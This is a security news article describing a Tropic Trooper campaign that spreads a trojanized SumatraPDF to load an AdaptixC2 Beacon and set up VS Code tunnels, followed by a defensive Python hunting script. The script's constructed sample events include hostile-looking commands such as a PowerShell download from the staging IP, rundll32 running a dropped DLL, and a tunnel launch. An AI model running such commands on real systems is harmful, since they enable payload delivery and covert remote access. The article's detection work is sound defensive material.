
Chinese-speaking individuals have been targeted in a new campaign that uses a trojanized version of the SumatraPDF reader to deploy the AdaptixC2 Beacon post-exploitation agent and ultimately facilitate the exploitation of Microsoft Visual Studio Code (VS Code) tunnels for remote access.
Zscaler ThreatLabz, which discovered the campaign last month, says with high confidence that it is the work of Tropic Trooper (also known as APT23, Earth Centaur, KeyBoy, and Pirate Panda), a hacker group known for targeting various organizations in Taiwan, Hong Kong, and the Philippines. The group is estimated to have been active since at least 2011.
“The attackers used GitHub as a command-and-control (C2) platform to create a custom AdaptixC2 Beacon listener,” security researcher Ying Hong Zhang said in an analysis.
Chinese-speaking individuals in Taiwan and individuals in South Korea and Japan are believed to be targeted by the campaign. The starting point of the attack is a ZIP archive containing a military-themed document lure that launches a malicious version of SumatraPDF. The trojanized reader displays a decoy PDF document while also retrieving encrypted shellcode from the staging server to launch the AdaptixC2 Beacon.
To accomplish this, the backdoored SumatraPDF executable launches a slightly modified version of the loader codenamed TOSHIS. This is a variant of Xiangoop, a Tropic Trooper-linked malware that has been used in the past to fetch next-stage payloads such as the Cobalt Strike Beacon and the Mythic framework’s Merlin agent.

The loader is responsible for activating a multi-stage attack and dropping both the lure document as a distraction mechanism and the AdaptixC2 beacon agent in the background. The agent uses GitHub for its C2 and sends beacons to attacker-controlled infrastructure to retrieve tasks to be executed on compromised hosts.
The attack only advances to the next stage if the victim is deemed worthy. At that point, the threat actor deploys VS Code and sets up a VS Code tunnel for remote access. On some machines, the attackers have been found to have installed another trojanized application, likely to better camouflage their actions.
Additionally, the staging server involved in the compromise (158.247.193[.]100) has been observed hosting custom backdoors called Cobalt Strike Beacon and EntryShell, both of which have been used by Tropic Trooper in the past.
“Similar to the TAOTH campaign, a publicly available backdoor is used as the payload,” Zscaler said. “Previously Cobalt Strike Beacon and Mythic Merlin were used, but threat actors are now moving to AdaptixC2.”
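The chain described above (a PDF reader that should never spawn loaders, a VS Code tunnel being set up for remote access, and a known staging IP) lends itself to a few simple process-creation hunting rules. The script below is an added example written for this article, not Zscaler's or anyone else's tooling: it runs three heuristics over constructed Sysmon-style process-creation records. The staging IP is the one the article names (defanged there); the process names, command lines and the allow-list of expected SumatraPDF child processes are constructed assumptions to be tuned per environment.

```python
"""
Hunting heuristics for the SumatraPDF -> loader -> VS Code tunnel chain.
Added example, not vendor code. Input records mimic Sysmon Event ID 1
fields (parent image, child image, command line); all events below are
constructed samples, not real telemetry.
"""
import re
from dataclasses import dataclass

# Indicator taken from the article (published defanged as 158.247.193[.]100).
STAGING_IP = "158.247.193.100"

# Assumed allow-list: the only child a PDF reader is expected to start is
# another instance of itself (e.g. for printing). Tune for your environment.
PDF_READER = "sumatrapdf.exe"
READER_EXPECTED_CHILDREN = {"sumatrapdf.exe"}

# "code tunnel" is the VS Code CLI sub-command that opens a remote tunnel;
# code-tunnel.exe is the CLI binary bundled with VS Code on Windows.
TUNNEL_RE = re.compile(
    r"\b(?:code(?:\.exe)?\s+tunnel|code-tunnel(?:\.exe)?)\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent: str   # full path of the parent image
    image: str    # full path of the new process image
    cmdline: str  # command line of the new process


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic the event trips (empty if none)."""
    hits: list[str] = []
    if _basename(ev.parent) == PDF_READER and _basename(ev.image) not in READER_EXPECTED_CHILDREN:
        hits.append("pdf-reader-unusual-child")
    if TUNNEL_RE.search(ev.cmdline):
        hits.append("vscode-tunnel")
    if STAGING_IP in ev.cmdline:
        hits.append("known-staging-ip")
    return hits


def hunt(events: list[ProcEvent]) -> list[dict]:
    """Keep only events with at least one hit, with the matched rule names."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"parent": ev.parent, "image": ev.image, "hits": hits})
    return findings


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\u\Downloads\doc\SumatraPDF.exe",
              r'"C:\Users\u\Downloads\doc\SumatraPDF.exe"'),
    ProcEvent(r"C:\Users\u\Downloads\doc\SumatraPDF.exe",
              r"C:\Users\u\Downloads\doc\SumatraPDF.exe",
              r'"C:\Users\u\Downloads\doc\SumatraPDF.exe" -print-to-default'),
    ProcEvent(r"C:\Users\u\Downloads\doc\SumatraPDF.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\u\AppData\Local\Temp\stage.dll,Run"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Users\u\AppData\Local\Programs\Microsoft VS Code\code.exe",
              r"code.exe tunnel --accept-server-license-terms"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -c Invoke-WebRequest http://158.247.193.100/s.bin"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["image"], "->", ", ".join(f["hits"]))
```

The first two sample events are benign (the reader starting from Explorer, and the reader spawning itself) and produce no findings; the remaining three each trip exactly one rule. In practice the tunnel rule is the highest-signal of the three where VS Code tunnels are not sanctioned, since the indicator IP will rotate long before the technique does.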
